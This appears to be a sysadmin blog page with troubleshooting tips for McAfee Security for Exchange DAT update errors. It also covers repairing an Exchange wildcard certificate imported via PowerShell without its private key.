The server actually has the latest DAT. As example on the left side below you see 9730 which is the DAT from 31.08.2020 as example.

Just the Update function does not understand the server received the DAT from the EPO instead from WAN.

Often Exchange behind Load Balancer like Kemp or F5 have limited WAN Internet access.

Some Tips:

• On smaller Exchange > Sometimes you can solve this by changing the Schedule like from 08:00 to 08:01 (Just add a minute) And update > Maybe fine
• If not behind Load Balancer > You may have to check your WAN access from the Exchange Server and if he can get the DAT from Mcafee
• If you download the DAT manual from Mcafee and try to install you will see that you already have the newest version.

Screenshot from 1. September 2020

Check in EPO under Products

If you can't get it to working for whatever reason, PUSH the DAT from McAfee EPO direct to the Exchange Server

where McAfee Security for Exchange runs. The Error in the GUI will stay.

Valid Exchange 2010/2013/2016

Problem:

You can IMPORT a KEYFILE (Password) protected Exchange Certificate via Powershell. The import itself does work, it's there but the Cert is NOT usable for Exchange or visible in Powershell get-exchange certificate or in the Exchange Console under Certificates.

Import-ExchangeCertificate

-Instance <String[]>

[-Confirm]

[-DomainController <Fqdn>]

[-FriendlyName <String>]

[-Password <SecureString>]

[-PrivateKeyExportable <$true | $false>]

[-Server <ServerIdParameter>]

[-WhatIf]

[<CommonParameters>]

What you did:

You did use Powershell to import a valid WILDCARD Certificate into Exchange without the password option. If you do this by GUI (Console) you have to enter a password if the Certificate is protected.

• The new imported wildcard does not open under get-exchangertificate | fl
• You are UNABLE to remove-exchangecertificate the invalid Certificate with remove-exchangecertificate –thumbprint error: (PrivateKeyMissing)
• You do NOT see the new Cert under GUI under Server in the Exchange Console

Remove-exchangecertificate -thumbprint E409F4412C605F44296957CD654EE45522EEC481

The certificate with thumbprint E409F4412C605F44296957CD654EE45522EEC481 was found but is not valid for use with Exchange Server (reason: PrivateKeyMissing).

If you TRY to reimport the same Certificate with GUI

e

Already exists

Solution:

OPEN MMC

ADD Certificate Snap in

 COMPUTER

LOCAL COMPUTER

PERSONAL CERTIFICATES

Be sure that you're using the Certificate Snap-In for the Local Computer account!)

Check IF you find any new Certificates WITHOUT the GOLDEN KEY on the left side in the SYMBOL. These are the imported CERTS where the PRIVATE KEY is missing.

Delete that Certificate if you are sure it's the one you just imported with Exchange Powershell before.

SOLVED – Reimport the Exchange Wildcard Certificate with the CORRECT Options and a KEYFILE (Passwordfile) in Powershell or simply use The Exchange-Console-GUI to import the Wildcard and enter the password there.

Please see our important Links regarding handling of Exchange Certificates and Errors

http://www.butsch.ch/post/Exchange-20102013-POP-or-IMAP-with-Wildcard-Certificate-activation.aspx

• Check that your import the INTERMEDIATE from your CERT provider
• Make sure your Exchange VLAN Can Reach the Internet and some Certificate Revocations Adress (Here is how to check those etc.)

http://www.butsch.ch/post/The-certificate-is-invalid-for-exchange-server-usage-Exchange-2010-SANUC.aspx

http://www.butsch.ch/post/Generate-SAN-UC-Certificate-SSL-on-Exchange-2010.aspx 

http://www.butsch.ch/post/Exchange-2010-Certificate-stays-in-PENDING-REQUEST-after-import.aspx

Exchange with Wildcard and POP3 / IMAP

http://www.butsch.ch/post/Exchange-20102013-POP-or-IMAP-with-Wildcard-Certificate-activation.aspx